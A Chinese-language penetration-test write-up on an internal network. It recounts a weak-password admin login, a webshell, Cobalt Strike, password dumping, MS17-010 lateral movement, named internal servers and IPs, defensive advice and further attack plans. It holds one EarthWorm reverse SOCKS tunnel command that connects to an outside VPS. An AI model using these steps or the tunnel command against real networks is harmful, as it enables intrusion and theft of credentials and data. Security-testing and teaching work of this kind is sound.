某站点的测试
字数 1204 2025-08-05 08:18:04
内网渗透测试实战教学文档
1. 初始入侵阶段
1.1 目标发现与初始访问
- 攻击向量:通过弱口令成功登录后台
- 利用方式:通过部署包实现getshell
- 权限获取:直接获得system权限
- 网络配置:3389端口开放,无WAF防护
1.2 工具使用
- Cobalt Strike (CS):用于建立持久化控制
- 密码读取:成功获取系统密码
- 代理设置:
E:\ew_for_Win.exe -s rssocks -d vps -e 33333 ./ew_for_linux64 -s rcsocks -l 22222 -e 33333 &
2. 内网信息收集
2.1 网络拓扑发现
- 内网IP段:192.168.10.x 和 192.168.11.x
- 设备类型:
- 域成员机器 (RSGROUP)
- 工作组机器 (WORKGROUP)
- 未命名设备 (-no name-)
2.2 关键设备识别
- 数据库服务器:192.168.10.35 (IMOTION-DB)
- 主服务器:192.168.10.36 (NRCS-MAIN)
- 备份服务器:192.168.10.37 (NRCS-BACKUP)
- 广播服务器:192.168.10.20 (BROADCAST)
3. 横向移动技术
3.1 漏洞利用
- MS17-010 (永恒之蓝):
- 成功攻陷192.168.10.202
- 发现但未成功利用的漏洞目标:
- 172.23.3.100 (Windows Server 2008 R2)
- 172.23.3.122 (Windows Server 2008 Enterprise)
3.2 密码重用攻击
- 从已攻陷机器抓取密码
- 尝试在内网其他机器上进行密码碰撞
3.3 网络跳板策略
- 192.168.10.36:双网卡但与其他网段不互通
- 192.168.10.202:不出网但可访问多个内网网段
4. 内网服务扫描
4.1 Web服务发现
- 发现网管系统,可查看网络结构
- 未发现可利用的Web漏洞
4.2 数据库信息
- 发现SQL Server实例:
/* 6 ธันวาคม 255917:31:51 User: sa Server: RSFEED03 Database: BEAsset Application: */
5. 渗透测试总结
5.1 成果
- 完全控制3台内网机器
- 绘制部分内网拓扑结构
- 获取多组凭证信息
5.2 受限因素
- 部分机器不出网
- 某些网段间网络隔离
- 高价值目标防护较强
6. 防御建议
- 密码策略:禁用弱口令,强制复杂密码
- 补丁管理:及时修复MS17-010等高危漏洞
- 网络隔离:合理划分VLAN,限制横向通信
- 监控措施:部署EDR/XDR检测横向移动行为
- 权限控制:限制system权限使用,实施最小权限原则
7. 工具清单
- Cobalt Strike (C2框架)
- ew (EarthWorm内网穿透工具)
- MS17-010利用工具
- 内网扫描工具(Nmap等)
- 密码抓取工具(Mimikatz等)
8. 后续攻击思路
- 针对数据库服务器(192.168.10.35)进行深入渗透
- 尝试从备份服务器(192.168.10.37)获取备份数据
- 通过已控机器作为跳板,探索172.x.x.x网段
- 尝试域渗透技术(如Kerberoasting等)